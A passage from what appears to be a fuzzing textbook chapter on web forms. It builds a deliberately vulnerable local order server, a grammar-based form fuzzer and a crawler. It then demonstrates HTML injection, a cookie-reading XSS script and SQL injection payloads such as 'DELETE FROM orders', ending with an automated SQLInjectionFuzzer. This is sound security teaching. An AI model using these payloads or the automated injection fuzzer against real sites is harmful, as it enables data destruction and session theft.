HTTPD_MESSAGE_QUEUE.put(httpd_url)
httpd.serve_forever()
```
The function `start_httpd()` starts the server in a separate process, which we start using the `multiprocess` module. It retrieves its URL from the message queue and returns it, such that we can start talking to the server.
```
from multiprocess import Process
def start_httpd(handler_class: type = SimpleHTTPRequestHandler) \
-> Tuple[Process, str]:
clear_httpd_messages()
httpd_process = Process(target=run_httpd_forever, args=(handler_class,))
httpd_process.start()
httpd_url = HTTPD_MESSAGE_QUEUE.get()
return httpd_process, httpd_url
```
Let us now start the server and save its URL:
```
httpd_process, httpd_url = start_httpd()
httpd_url
```
### Interacting with the Server
Let us now access the server just created.
#### Direct Browser Access
If you are running the Jupyter notebook server on the local host as well, you can now access the server directly at the given URL. Simply open the address in `httpd_url` by clicking on the link below.
**Note**: This only works if you are running the Jupyter notebook server on the local host.
```
def print_url(url: str) -> None:
if rich_output():
display(HTML('<pre><a href="%s">%s</a></pre>' % (url, url)))
else:
print(terminal_escape(url))
print_url(httpd_url)
```
Even more convenient, you may be able to interact directly with the server using the window below.
**Note**: This only works if you are running the Jupyter notebook server on the local host.
```
from IPython.display import IFrame
IFrame(httpd_url, '100%', 230)
```
After interaction, you can retrieve the messages produced by the server:
```
print_httpd_messages()
```
We can also see any orders placed in the `orders` database (`db`):
```
print(db.execute("SELECT * FROM orders").fetchall())
```
And we can clear the order database:
```
db.execute("DELETE FROM orders")
db.commit()
```
#### Retrieving the Home Page
Even if our browser cannot directly interact with the server, the _notebook_ can. We can, for instance, retrieve the contents of the home page and display them:
```
contents = webbrowser(httpd_url)
HTML(contents)
```
#### Placing Orders
To test this form, we can generate URLs with orders and have the server process them.
The method `urljoin()` puts together a base URL (i.e., the URL of our server) and a path – say, the path towards our order.
```
from urllib.parse import urljoin, urlsplit
urljoin(httpd_url, "/order?foo=bar")
```
With `urljoin()`, we can create a full URL that is the same as the one generated by the browser as we submit the order form. Sending this URL to the browser effectively places the order, as we can see in the server log produced:
```
contents = webbrowser(urljoin(httpd_url,
"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"))
```
The web page returned confirms the order:
```
HTML(contents)
```
And the order is in the database, too:
```
print(db.execute("SELECT * FROM orders").fetchall())
```
#### Error Messages
We can also test whether the server correctly responds to invalid requests. Nonexistent pages, for instance, are correctly handled:
```
HTML(webbrowser(urljoin(httpd_url, "/some/other/path")))
```
You may remember we also have a page for internal server errors. Can we get the server to produce this page? To find this out, we have to test the server thoroughly – which we do in the remainder of this chapter.
## Fuzzing Input Forms
After setting up and starting the server, let us now go and systematically test it – first with expected, and then with less expected values.
### Fuzzing with Expected Values
Since placing orders is all done by creating appropriate URLs, we define a [grammar](Grammars.ipynb) `ORDER_GRAMMAR` which encodes ordering URLs. It comes with a few sample values for names, email addresses, cities and (random) digits.
#### Excursion: Implementing cgi_decode()
To make it easier to define strings that become part of a URL, we define the function `cgi_encode()`, taking a string and autmatically encoding it into CGI:
```
import string
def cgi_encode(s: str, do_not_encode: str = "") -> str:
ret = ""
for c in s:
if (c in string.ascii_letters or c in string.digits
or c in "$-_.+!*'()," or c in do_not_encode):
ret += c
elif c == ' ':
ret += '+'
else:
ret += "%%%02x" % ord(c)
return ret
s = cgi_encode('Is "DOW30" down .24%?')
s
```
The optional parameter `do_not_encode` allows us to skip certain characters from encoding. This is useful when encoding grammar rules:
```
cgi_encode("<string>@<string>", "<>")
```
`cgi_encode()` is the exact counterpart of the `cgi_decode()` function defined in the [chapter on coverage](Coverage.ipynb):
```
from Coverage import cgi_decode # minor dependency
cgi_decode(s)
```
#### End of Excursion
In the grammar, we make use of `cgi_encode()` to encode strings:
```
from Grammars import crange, is_valid_grammar, syntax_diagram, Grammar
ORDER_GRAMMAR: Grammar = {
"<start>": ["<order>"],
"<order>": ["/order?item=<item>&name=<name>&email=<email>&city=<city>&zip=<zip>"],
"<item>": ["tshirt", "drill", "lockset"],
"<name>": [cgi_encode("Jane Doe"), cgi_encode("John Smith")],
"<email>": [cgi_encode("j.doe@example.com"), cgi_encode("j_smith@example.com")],
"<city>": ["Seattle", cgi_encode("New York")],
"<zip>": ["<digit>" * 5],
"<digit>": crange('0', '9')
}
assert is_valid_grammar(ORDER_GRAMMAR)
syntax_diagram(ORDER_GRAMMAR)
```
Using [one of our grammar fuzzers](GrammarFuzzer.iynb), we can instantiate this grammar and generate URLs:
```
from GrammarFuzzer import GrammarFuzzer
order_fuzzer = GrammarFuzzer(ORDER_GRAMMAR)
[order_fuzzer.fuzz() for i in range(5)]
```
Sending these URLs to the server will have them processed correctly:
```
HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))
print(db.execute("SELECT * FROM orders").fetchall())
```
### Fuzzing with Unexpected Values
We can now see that the server does a good job when faced with "standard" values. But what happens if we feed it non-standard values? To this end, we make use of a [mutation fuzzer](MutationFuzzer.ipynb) which inserts random changes into the URL. Our seed (i.e. the value to be mutated) comes from the grammar fuzzer:
```
seed = order_fuzzer.fuzz()
seed
```
Mutating this string yields mutations not only in the field values, but also in field names as well as the URL structure.
```
from MutationFuzzer import MutationFuzzer # minor deoendency
mutate_order_fuzzer = MutationFuzzer([seed], min_mutations=1, max_mutations=1)
[mutate_order_fuzzer.fuzz() for i in range(5)]
```
Let us fuzz a little until we get an internal server error. We use the Python `requests` module to interact with the Web server such that we can directly access the HTTP status code.
```
while True:
path = mutate_order_fuzzer.fuzz()
url = urljoin(httpd_url, path)
r = requests.get(url)
if r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:
break
```
That didn't take long. Here's the offending URL:
```
url
clear_httpd_messages()
HTML(webbrowser(url))
```
How does the URL cause this internal error? We make use of [delta debugging](Reducer.ipynb) to minimize the failure-inducing path, setting up a `WebRunner` class to define the failure condition:
```
failing_path = path
failing_path
from Fuzzer import Runner
class WebRunner(Runner):
"""Runner for a Web server"""
def __init__(self, base_url: str = None):
self.base_url = base_url
def run(self, url: str) -> Tuple[str, str]:
if self.base_url is not None:
url = urljoin(self.base_url, url)
import requests # for imports
r = requests.get(url)
if r.status_code == HTTPStatus.OK:
return url, Runner.PASS
elif r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:
return url, Runner.FAIL
else:
return url, Runner.UNRESOLVED
web_runner = WebRunner(httpd_url)
web_runner.run(failing_path)
```
This is the minimized path:
```
from Reducer import DeltaDebuggingReducer # minor
minimized_path = DeltaDebuggingReducer(web_runner).reduce(failing_path)
minimized_path
```
It turns out that our server encounters an internal error if we do not supply the requested fields:
```
minimized_url = urljoin(httpd_url, minimized_path)
minimized_url
clear_httpd_messages()
HTML(webbrowser(minimized_url))
```
We see that we might have a lot to do to make our Web server more robust against unexpected inputs. The [exercises](#Exercises) give some instructions on what to do.
## Extracting Grammars for Input Forms
In our previous examples, we have assumed that we have a grammar that produces valid (or less valid) order queries. However, such a grammar does not need to be specified manually; we can also _extract it automatically_ from a Web page at hand. This way, we can apply our test generators on arbitrary Web forms without a manual specification step.
### Searching HTML for Input Fields
The key idea of our approach is to identify all input fields in a form. To this end, let us take a look at how the individual elements in our order form are encoded in HTML:
```
html_text = webbrowser(httpd_url)
print(html_text[html_text.find("<form"):html_text.find("</form>") + len("</form>")])
```
We see that there is a number of form elements that accept inputs, in particular `<input>`, but also `<select>` and `<option>`. The idea now is to _parse_ the HTML of the Web page in question, to extract these individual input elements, and then to create a _grammar_ that produces a matching URL, effectively filling out the form.
To parse the HTML page, we could define a grammar to parse HTML and make use of [our own parser infrastructure](Parser.ipynb). However, it is much easier to not reinvent the wheel and instead build on the existing, dedicated `HTMLParser` class from the Python library.
```
from html.parser import HTMLParser
```
During parsing, we search for `<form>` tags and save the associated action (i.e., the URL to be invoked when the form is submitted) in the `action` attribute. While processing the form, we create a map `fields` that holds all input fields we have seen; it maps field names to the respective HTML input types (`"text"`, `"number"`, `"checkbox"`, etc.). Exclusive selection options map to a list of possible values; the `select` stack holds the currently active selection.
```
class FormHTMLParser(HTMLParser):
"""A parser for HTML forms"""
def reset(self) -> None:
super().reset()
# Form action attribute (a URL)
self.action = ""
# Map of field name to type
# (or selection name to [option_1, option_2, ...])
self.fields: Dict[str, List[str]] = {}
# Stack of currently active selection names
self.select: List[str] = []
```
While parsing, the parser calls `handle_starttag()` for every opening tag (such as `<form>`) found; conversely, it invokes `handle_endtag()` for closing tags (such as `</form>`). `attributes` gives us a map of associated attributes and values.
Here is how we process the individual tags:
* When we find a `<form>` tag, we save the associated action in the `action` attribute;
* When we find an `<input>` tag or similar, we save the type in the `fields` attribute;
* When we find a `<select>` tag or similar, we push its name on the `select` stack;
* When we find an `<option>` tag, we append the option to the list associated with the last pushed `<select>` tag.
```
class FormHTMLParser(FormHTMLParser):
def handle_starttag(self, tag, attrs):
attributes = {attr_name: attr_value for attr_name, attr_value in attrs}
# print(tag, attributes)
if tag == "form":
self.action = attributes.get("action", "")
elif tag == "select" or tag == "datalist":
if "name" in attributes:
name = attributes["name"]
self.fields[name] = []
self.select.append(name)
else:
self.select.append(None)
elif tag == "option" and "multiple" not in attributes:
current_select_name = self.select[-1]
if current_select_name is not None and "value" in attributes:
self.fields[current_select_name].append(attributes["value"])
elif tag == "input" or tag == "option" or tag == "textarea":
if "name" in attributes:
name = attributes["name"]
self.fields[name] = attributes.get("type", "text")
elif tag == "button":
if "name" in attributes:
name = attributes["name"]
self.fields[name] = [""]
class FormHTMLParser(FormHTMLParser):
def handle_endtag(self, tag):
if tag == "select":
self.select.pop()
```
Our implementation handles only one form per Web page; it also works on HTML only, ignoring all interaction coming from JavaScript. Also, it does not support all HTML input types.
Let us put this parser to action. We create a class `HTMLGrammarMiner` that takes a HTML document to parse. It then returns the associated action and the associated fields:
```
class HTMLGrammarMiner:
"""Mine a grammar from a HTML form"""
def __init__(self, html_text: str) -> None:
"""Constructor. `html_text` is the HTML string to parse."""
html_parser = FormHTMLParser()
html_parser.feed(html_text)
self.fields = html_parser.fields
self.action = html_parser.action
```
Applied on our order form, this is what we get:
```
html_miner = HTMLGrammarMiner(html_text)
html_miner.action
html_miner.fields
```
From this structure, we can now generate a grammar that automatically produces valid form submission URLs.
### Mining Grammars for Web Pages
To create a grammar from the fields extracted from HTML, we build on the `CGI_GRAMMAR` defined in the [chapter on grammars](Grammars.ipynb). The key idea is to define rules for every HTML input type: An HTML `number` type will get values from the `<number>` rule; likewise, values for the HTML `email` type will be defined from the `<email>` rule. Our default grammar provides very simple rules for these types.
```
from Grammars import crange, srange, new_symbol, unreachable_nonterminals, CGI_GRAMMAR, extend_grammar
class HTMLGrammarMiner(HTMLGrammarMiner):
QUERY_GRAMMAR: Grammar = extend_grammar(CGI_GRAMMAR, {
"<start>": ["<action>?<query>"],
"<text>": ["<string>"],
"<number>": ["<digits>"],
"<digits>": ["<digit>", "<digits><digit>"],
"<digit>": crange('0', '9'),
"<checkbox>": ["<_checkbox>"],
"<_checkbox>": ["on", "off"],
"<email>": ["<_email>"],
"<_email>": [cgi_encode("<string>@<string>", "<>")],
# Use a fixed password in case we need to repeat it
"<password>": ["<_password>"],
"<_password>": ["abcABC.123"],
# Stick to printable characters to avoid logging problems
"<percent>": ["%<hexdigit-1><hexdigit>"],
"<hexdigit-1>": srange("34567"),
# Submissions:
"<submit>": [""]
})
```
Our grammar miner now takes the fields extracted from HTML, converting them into rules. Essentially, every input field encountered gets included in the resulting query URL; and it gets a rule expanding it into the appropriate type.
```
class HTMLGrammarMiner(HTMLGrammarMiner):
def mine_grammar(self) -> Grammar:
"""Extract a grammar from the given HTML text"""
grammar: Grammar = extend_grammar(self.QUERY_GRAMMAR)
grammar["<action>"] = [self.action]
query = ""
for field in self.fields:
field_symbol = new_symbol(grammar, "<" + field + ">")
field_type = self.fields[field]
if query != "":
query += "&"
query += field_symbol
if isinstance(field_type, str):
field_type_symbol = "<" + field_type + ">"
grammar[field_symbol] = [field + "=" + field_type_symbol]
if field_type_symbol not in grammar:
# Unknown type
grammar[field_type_symbol] = ["<text>"]
else:
# List of values
value_symbol = new_symbol(grammar, "<" + field + "-value>")
grammar[field_symbol] = [field + "=" + value_symbol]
grammar[value_symbol] = field_type # type: ignore
grammar["<query>"] = [query]
# Remove unused parts
for nonterminal in unreachable_nonterminals(grammar):
del grammar[nonterminal]
assert is_valid_grammar(grammar)
return grammar
```
Let us show `HTMLGrammarMiner` in action, again applied on our order form. Here is the full resulting grammar:
```
html_miner = HTMLGrammarMiner(html_text)
grammar = html_miner.mine_grammar()
grammar
```
Let us take a look into the structure of the grammar. It produces URL paths of this form:
```
grammar["<start>"]
```
Here, the `<action>` comes from the `action` attribute of the HTML form:
```
grammar["<action>"]
```
The `<query>` is composed from the individual field items:
```
grammar["<query>"]
```
Each of these fields has the form `<field-name>=<field-type>`, where `<field-type>` is already defined in the grammar:
```
grammar["<zip>"]
grammar["<terms>"]
```
These are the query URLs produced from the grammar. We see that these are similar to the ones produced from our hand-crafted grammar, except that the string values for names, email addresses, and cities are now completely random:
```
order_fuzzer = GrammarFuzzer(grammar)
[order_fuzzer.fuzz() for i in range(3)]
```
We can again feed these directly into our Web browser:
```
HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))
```
We see (one more time) that we can mine a grammar automatically from given data.
### A Fuzzer for Web Forms
To make things most convenient, let us define a `WebFormFuzzer` class that does everything in one place. Given a URL, it extracts its HTML content, mines the grammar and then produces inputs for it.
```
class WebFormFuzzer(GrammarFuzzer):
"""A Fuzzer for Web forms"""
def __init__(self, url: str, *,
grammar_miner_class: Optional[type] = None,
**grammar_fuzzer_options):
"""Constructor.
`url` - the URL of the Web form to fuzz.
`grammar_miner_class` - the class of the grammar miner
to use (default: `HTMLGrammarMiner`)
Other keyword arguments are passed to the `GrammarFuzzer` constructor
"""
if grammar_miner_class is None:
grammar_miner_class = HTMLGrammarMiner
self.grammar_miner_class = grammar_miner_class
# We first extract the HTML form and its grammar...
html_text = self.get_html(url)
grammar = self.get_grammar(html_text)
# ... and then initialize the `GrammarFuzzer` superclass with it
super().__init__(grammar, **grammar_fuzzer_options)
def get_html(self, url: str):
"""Retrieve the HTML text for the given URL `url`.
To be overloaded in subclasses."""
return requests.get(url).text
def get_grammar(self, html_text: str):
"""Obtain the grammar for the given HTML `html_text`.
To be overloaded in subclasses."""
grammar_miner = self.grammar_miner_class(html_text)
return grammar_miner.mine_grammar()
```
All it now takes to fuzz a Web form is to provide its URL:
```
web_form_fuzzer = WebFormFuzzer(httpd_url)
web_form_fuzzer.fuzz()
```
We can combine the fuzzer with a `WebRunner` as defined above to run the resulting fuzz inputs directly on our Web server:
```
web_form_runner = WebRunner(httpd_url)
web_form_fuzzer.runs(web_form_runner, 10)
```
While convenient to use, this fuzzer is still very rudimentary:
* It is limited to one form per page.
* It only supports `GET` actions (i.e., inputs encoded into the URL). A full Web form fuzzer would have to at least support `POST` actions.
* The fuzzer is build on HTML only. There is no Javascript handling for dynamic Web pages.
Let us clear any pending messages before we get to the next section:
```
clear_httpd_messages()
```
## Crawling User Interfaces
So far, we have assumed there would be only one form to explore. A real Web server, of course, has several pages – and possibly several forms, too. We define a simple *crawler* that explores all the links that originate from one page.
Our crawler is pretty straightforward. Its main component is again a `HTMLParser` that analyzes the HTML code for links of the form
```html
<a href="<link>">
```
and saves all the links found in a list called `links`.
```
class LinkHTMLParser(HTMLParser):
"""Parse all links found in a HTML page"""
def reset(self):
super().reset()
self.links = []
def handle_starttag(self, tag, attrs):
attributes = {attr_name: attr_value for attr_name, attr_value in attrs}
if tag == "a" and "href" in attributes:
# print("Found:", tag, attributes)
self.links.append(attributes["href"])
```
The actual crawler comes as a _generator function_ `crawl()` which produces one URL after another. By default, it returns only URLs that reside on the same host; the parameter `max_pages` controls how many pages (default: 1) should be scanned. We also respect the `robots.txt` file on the remote site to check which pages we are allowed to scan.
### Excursion: Implementing a Crawler
```
from collections import deque
import urllib.robotparser
def crawl(url, max_pages: Union[int, float] = 1, same_host: bool = True):
"""Return the list of linked URLs from the given URL.
`max_pages` - the maximum number of pages accessed.
`same_host` - if True (default), stay on the same host"""
pages = deque([(url, "<param>")])
urls_seen = set()
rp = urllib.robotparser.RobotFileParser()
rp.set_url(urljoin(url, "/robots.txt"))
rp.read()
while len(pages) > 0 and max_pages > 0:
page, referrer = pages.popleft()
if not rp.can_fetch("*", page):
# Disallowed by robots.txt
continue
r = requests.get(page)
max_pages -= 1
if r.status_code != HTTPStatus.OK:
print("Error " + repr(r.status_code) + ": " + page,
"(referenced from " + referrer + ")",
file=sys.stderr)
continue
content_type = r.headers["content-type"]
if not content_type.startswith("text/html"):
continue
parser = LinkHTMLParser()
parser.feed(r.text)
for link in parser.links:
target_url = urljoin(page, link)
if same_host and urlsplit(
target_url).hostname != urlsplit(url).hostname:
# Different host
continue
if urlsplit(target_url).fragment != "":
# Ignore #fragments
continue
if target_url not in urls_seen:
pages.append((target_url, page))
urls_seen.add(target_url)
yield target_url
if page not in urls_seen:
urls_seen.add(page)
yield page
```
### End of Excursion
We can run the crawler on our own server, where it will quickly return the order page and the terms and conditions page.
```
for url in crawl(httpd_url):
print_httpd_messages()
print_url(url)
```
We can also crawl over other sites, such as the home page of this project.
```
for url in crawl("https://www.fuzzingbook.org/"):
print_url(url)
```
Once we have crawled over all the links of a site, we can generate tests for all the forms we found:
```
for url in crawl(httpd_url, max_pages=float('inf')):
web_form_fuzzer = WebFormFuzzer(url)
web_form_runner = WebRunner(url)
print(web_form_fuzzer.run(web_form_runner))
```
For even better effects, one could integrate crawling and fuzzing – and also analyze the order confirmation pages for further links. We leave this to the reader as an exercise.
Let us get rid of any server messages accumulated above:
```
clear_httpd_messages()
```
## Crafting Web Attacks
Before we close the chapter, let us take a look at a special class of "uncommon" inputs that not only yield generic failures, but actually allow _attackers_ to manipulate the server at their will. We will illustrate three common attacks using our server, which (surprise) actually turns out to be vulnerable against all of them.
### HTML Injection Attacks
The first kind of attack we look at is *HTML injection*. The idea of HTML injection is to supply the Web server with _data that can also be interpreted as HTML_. If this HTML data is then displayed to users in their Web browsers, it can serve malicious purposes, although (seemingly) originating from a reputable site. If this data is also _stored_, it becomes a _persistent_ attack; the attacker does not even have to lure victims towards specific pages.
Here is an example of a (simple) HTML injection. For the `name` field, we not only use plain text, but also embed HTML tags – in this case, a link towards a malware-hosting site.
```
from Grammars import extend_grammar
ORDER_GRAMMAR_WITH_HTML_INJECTION: Grammar = extend_grammar(ORDER_GRAMMAR, {
"<name>": [cgi_encode('''
Jane Doe<p>
<strong><a href="www.lots.of.malware">Click here for cute cat pictures!</a></strong>
</p>
''')],
})
```
If we use this grammar to create inputs, the resulting URL will have all of the HTML encoded in:
```
html_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_HTML_INJECTION)
order_with_injected_html = html_injection_fuzzer.fuzz()
order_with_injected_html
```
What hapens if we send this string to our Web server? It turns out that the HTML is left in the confirmation page and shown as link. This also happens in the log:
```
HTML(webbrowser(urljoin(httpd_url, order_with_injected_html)))
```
Since the link seemingly comes from a trusted origin, users are much more likely to follow it. The link is even persistent, as it is stored in the database:
```
print(db.execute("SELECT * FROM orders WHERE name LIKE '%<%'").fetchall())
```
This means that anyone ever querying the database (for instance, operators processing the order) will also see the link, multiplying its impact. By carefully crafting the injected HTML, one can thus expose malicious content to a large number of users – until the injected HTML is finally deleted.
### Cross-Site Scripting Attacks
If one can inject HTML code into a Web page, one can also inject *JavaScript* code as part of the injected HTML. This code would then be executed as soon as the injected HTML is rendered.
This is particularly dangerous because executed JavaScript always executes in the _origin_ of the page which contains it. Therefore, an attacker can normally not force a user to run JavaScript in any origin he does not control himself. When an attacker, however, can inject his code into a vulnerable Web application, he can have the client run the code with the (trusted) Web application as origin.
In such a *cross-site scripting* (*XSS*) attack, the injected script can do a lot more than just plain HTML. For instance, the code can access sensitive page content or session cookies. If the code in question runs in the operator's browser (for instance, because an operator is reviewing the list of orders), it could retrieve any other information shown on the screen and thus steal order details for a variety of customers.
Here is a very simple example of a script injection. Whenever the name is displayed, it causes the browser to "steal" the current *session cookie* – the piece of data the browser uses to identify the user with the server. In our case, we could steal the cookie of the Jupyter session.
```
ORDER_GRAMMAR_WITH_XSS_INJECTION: Grammar = extend_grammar(ORDER_GRAMMAR, {
"<name>": [cgi_encode('Jane Doe' +
'<script>' +
'document.title = document.cookie.substring(0, 10);' +
'</script>')
],
})
xss_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_XSS_INJECTION)
order_with_injected_xss = xss_injection_fuzzer.fuzz()
order_with_injected_xss
url_with_injected_xss = urljoin(httpd_url, order_with_injected_xss)
url_with_injected_xss
HTML(webbrowser(url_with_injected_xss, mute=True))
```
The message looks as always – but if you have a look at your browser title, it should now show the first 10 characters of your "secret" notebook cookie. Instead of showing its prefix in the title, the script could also silently send the cookie to a remote server, allowing attackers to highjack your current notebook session and interact with the server on your behalf. It could also go and access and send any other data that is shown in your browser or otherwise available. It could run a *keylogger* and steal passwords and other sensitive data as it is typed in. Again, it will do so every time the compromised order with Jane Doe's name is shown in the browser and the associated script is executed.
Let us go and reset the title to a less sensitive value:
```
HTML('<script>document.title = "Jupyter"</script>')
```
### SQL Injection Attacks
Cross-site scripts have the same privileges as web pages – most notably, they cannot access or change data outside of your browser. So-called *SQL injection* targets _databases_, allowing to inject commands that can read or modify data in the database, or change the purpose of the original query.
To understand how SQL injection works, let us take a look at the code that produces the SQL command to insert a new order into the database:
```python
sql_command = ("INSERT INTO orders " +
"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values))
```
What happens if any of the values (say, `name`) has a value that _can also be interpreted as a SQL command?_ Then, instead of the intended `INSERT` command, we would execute the command imposed by `name`.
Let us illustrate this by an example. We set the individual values as they would be found during execution:
```
values: Dict[str, str] = {
"item": "tshirt",
"name": "Jane Doe",
"email": "j.doe@example.com",
"city": "Seattle",
"zip": "98104"
}
```
and format the string as seen above:
```
sql_command = ("INSERT INTO orders " +
"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values))
sql_command
```
All fine, right? But now, we define a very "special" name that can also be interpreted as a SQL command:
```
values["name"] = "Jane', 'x', 'x', 'x'); DELETE FROM orders; -- "
sql_command = ("INSERT INTO orders " +
"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values))
sql_command
```
What happens here is that we now get a command to insert values into the database (with a few "dummy" values `x`), followed by a SQL `DELETE` command that would _delete all entries_ of the orders table. The string `-- ` starts a SQL _comment_ such that the remainder of the original query would be easily ignored. By crafting strings that can also be interpreted as SQL commands, attackers can alter or delete database data, bypass authentication mechanisms and many more.
Is our server also vulnerable to such attacks? Of course it is. We create a special grammar such that we can set the `<name>` parameter to a string with SQL injection, just as shown above.
```
from Grammars import extend_grammar
ORDER_GRAMMAR_WITH_SQL_INJECTION = extend_grammar(ORDER_GRAMMAR, {
"<name>": [cgi_encode("Jane', 'x', 'x', 'x'); DELETE FROM orders; --")],
})
sql_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_SQL_INJECTION)
order_with_injected_sql = sql_injection_fuzzer.fuzz()
order_with_injected_sql
```
These are the current orders:
```
print(db.execute("SELECT * FROM orders").fetchall())
```
Let us go and send our URL with SQL injection to the server. From the log, we see that the "malicious" SQL command is formed just as sketched above, and executed, too.
```
contents = webbrowser(urljoin(httpd_url, order_with_injected_sql))
```
All orders are now gone:
```
print(db.execute("SELECT * FROM orders").fetchall())
```
This effect is also illustrated [in this very popular XKCD comic](https://xkcd.com/327/):
{width=100%}
Even if we had not been able to execute arbitrary commands, being able to compromise an orders database offers several possibilities for mischief. For instance, we could use the address and matching credit card number of an existing person to go through validation and submit an order, only to have the order then delivered to an address of our choice. We could also use SQL injection to inject HTML and JavaScript code as above, bypassing possible sanitization geared at these domains.
To avoid such effects, the remedy is to _sanitize_ all third-party inputs – no character in the input must be interpretable as plain HTML, JavaScript, or SQL. This is achieved by properly _quoting_ and _escaping_ inputs. The [exercises](#Exercises) give some instructions on what to do.
### Leaking Internal Information
To craft the above SQL queries, we have used _insider information_ – for instance, we knew the name of the table as well as its structure. Surely, an attacker would not know this and thus not be able to run the attack, right? Unfortunately, it turns out we are leaking all of this information out to the world in the first place. The error message produced by our server reveals everything we need:
```
answer = webbrowser(urljoin(httpd_url, "/order"), mute=True)
HTML(answer)
```
The best way to avoid information leakage through failures is of course not to fail in the first place. But if you fail, _make it hard for the attacker to establish a link between the attack and the failure._ In particular,
* Do not produce "internal error" messages (and certainly not ones with internal information).
* Do not become unresponsive; just go back to the home page and ask the user to supply correct data.
One more time, the [exercises](#Exercises) give some instructions on how to fix the server.
If you can manipulate the server not only to alter information, but also to _retrieve_ information, you can learn about table names and structure by accessing special _tables_ (also called *data dictionary*) in which database servers store their metadata. In the MySQL server, for instance, the special table `information_schema` holds metadata such as the names of databases and tables, data types of columns, or access privileges.
## Fully Automatic Web Attacks
So far, we have demonstrated the above attacks using our manually written order grammar. However, the attacks also work for generated grammars. We extend `HTMLGrammarMiner` by adding a number of common SQL injection attacks:
```
class SQLInjectionGrammarMiner(HTMLGrammarMiner):
"""Demonstration of an automatic SQL Injection attack grammar miner"""
# Some common attack schemes
ATTACKS: List[str] = [
"<string>' <sql-values>); <sql-payload>; <sql-comment>",
"<string>' <sql-comment>",
"' OR 1=1<sql-comment>'",
"<number> OR 1=1",
]
def __init__(self, html_text: str, sql_payload: str):
"""Constructor.
`html_text` - the HTML form to be attacked
`sql_payload` - the SQL command to be executed
"""
super().__init__(html_text)
self.QUERY_GRAMMAR = extend_grammar(self.QUERY_GRAMMAR, {
"<text>": ["<string>", "<sql-injection-attack>"],
"<number>": ["<digits>", "<sql-injection-attack>"],
"<checkbox>": ["<_checkbox>", "<sql-injection-attack>"],
"<email>": ["<_email>", "<sql-injection-attack>"],
"<sql-injection-attack>": [
cgi_encode(attack, "<->") for attack in self.ATTACKS
],
"<sql-values>": ["", cgi_encode("<sql-values>, '<string>'", "<->")],
"<sql-payload>": [cgi_encode(sql_payload)],
"<sql-comment>": ["--", "#"],
})
html_miner = SQLInjectionGrammarMiner(
html_text, sql_payload="DROP TABLE orders")
grammar = html_miner.mine_grammar()
grammar
grammar["<text>"]
```
We see that several fields now are tested for vulnerabilities:
```
sql_fuzzer = GrammarFuzzer(grammar)
sql_fuzzer.fuzz()
print(db.execute("SELECT * FROM orders").fetchall())
contents = webbrowser(urljoin(httpd_url,
"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"))
def orders_db_is_empty():
"""Return True if the orders database is empty (= we have been successful)"""
try:
entries = db.execute("SELECT * FROM orders").fetchall()
except sqlite3.OperationalError:
return True
return len(entries) == 0
orders_db_is_empty()
```
We create a `SQLInjectionFuzzer` that does it all automatically.
```
class SQLInjectionFuzzer(WebFormFuzzer):
"""Simple demonstrator of a SQL Injection Fuzzer"""
def __init__(self, url: str, sql_payload : str ="", *,
sql_injection_grammar_miner_class: Optional[type] = None,
**kwargs):
"""Constructor.
`url` - the Web page (with a form) to retrieve
`sql_payload` - the SQL command to execute
`sql_injection_grammar_miner_class` - the miner to be used
(default: SQLInjectionGrammarMiner)
Other keyword arguments are passed to `WebFormFuzzer`.
"""
self.sql_payload = sql_payload
if sql_injection_grammar_miner_class is None:
sql_injection_grammar_miner_class = SQLInjectionGrammarMiner
self.sql_injection_grammar_miner_class = sql_injection_grammar_miner_class
super().__init__(url, **kwargs)
def get_grammar(self, html_text):
"""Obtain a grammar with SQL injection commands"""
grammar_miner = self.sql_injection_grammar_miner_class(
html_text, sql_payload=self.sql_payload)
return grammar_miner.mine_grammar()
sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
web_runner = WebRunner(httpd_url)
trials = 1
while True:
sql_fuzzer.run(web_runner)
if orders_db_is_empty():
break
trials += 1
trials
```
Our attack was successful! After less than a second of testing, our database is empty:
```
orders_db_is_empty()
```
Again, note the level of possible automation: We can
* Crawl the Web pages of a host for possible forms
* Automatically identify form fields and possible values
* Inject SQL (or HTML, or JavaScript) into any of these fields
and all of this fully automatically, not needing anything but the URL of the site.
The bad news is that with a tool set as the above, anyone can attack web sites. The even worse news is that such penetration tests take place every day, on every web site. The good news, though, is that after reading this chapter, you now get an idea of how Web servers are attacked every day – and what you as a Web server maintainer could and should do to prevent this.
## Synopsis
This chapter provides a simple (and vulnerable) Web server and two experimental fuzzers that are applied to it.
### Fuzzing Web Forms
`WebFormFuzzer` demonstrates how to interact with a Web form. Given a URL with a Web form, it automatically extracts a grammar that produces a URL; this URL contains values for all form elements. Support is limited to GET forms and a subset of HTML form elements.
Here's the grammar extracted for our vulnerable Web server:
```
web_form_fuzzer = WebFormFuzzer(httpd_url)
web_form_fuzzer.grammar['<start>']
web_form_fuzzer.grammar['<action>']
web_form_fuzzer.grammar['<query>']
```
Using it for fuzzing yields a path with all form values filled; accessing this path acts like filling out and submitting the form.
```
web_form_fuzzer.fuzz()
```
Repeated calls to `WebFormFuzzer.fuzz()` invoke the form again and again, each time with different (fuzzed) values.
Internally, `WebFormFuzzer` builds on a helper class named `HTMLGrammarMiner`; you can extend its functionality to include more features.
### SQL Injection Attacks
`SQLInjectionFuzzer` is an experimental extension of `WebFormFuzzer` whose constructor takes an additional _payload_ – an SQL command to be injected and executed on the server. Otherwise, it is used like `WebFormFuzzer`:
```
sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
sql_fuzzer.fuzz()
```
As you can see, the path to be retrieved contains the payload encoded into one of the form field values.
Internally, `SQLInjectionFuzzer` builds on a helper class named `SQLInjectionGrammarMiner`; you can extend its functionality to include more features.
`SQLInjectionFuzzer` is a proof-of-concept on how to build a malicious fuzzer; you should study and extend its code to make actual use of it.
```
# ignore
from ClassDiagram import display_class_hierarchy
